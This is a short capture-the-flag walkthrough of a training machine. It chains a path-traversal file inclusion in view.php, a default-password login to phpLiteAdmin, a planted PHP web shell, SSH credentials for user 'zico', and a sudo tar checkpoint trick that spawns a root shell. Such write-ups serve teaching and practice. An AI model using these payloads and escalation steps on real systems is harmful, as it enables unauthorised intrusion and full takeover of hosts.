I found that this target has only 3 open ports (22 SSH, 80 HTTP, and 111 RPC). I started with the HTTP port by browsing the website hosting on this web server.
I found view.php linked to home page.
Check them out Button is linked to /view.php?page=tools.html means maybe LFI will work
URL : /view.php?page=../../../../../etc/passwd
So far i got LFI i enumerated with it but got nothing interesting so i did dirb
In dbadmin folder phpliteadmin v1.9.3 is running
I logged in by guessing default password : admin
Exploit Link : https://www.exploit-db.com/exploits/24044
using this exploit i successfully exploited phpliteadmin to get a shell
According to exploit: Steps :
phpliteadmin is reveling the full path of php script.
Default Value : ” <?php echo system($_GET[“cmd”]); ?>”
Now to call the shell, Remember the LFI found. shell can be easily called from there
URL : view.php?page=../../usr/databases/hack.php&cmd=id
Using this LFI i found “zico” user’s home directory in which there is wordpress directory contains the username and password which can be used to connect to ssh
Username : zico
Password : sWfCsfJSPV9H3AmQzw8
i can run tar and zip command as a root without any password.
sudo tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/sh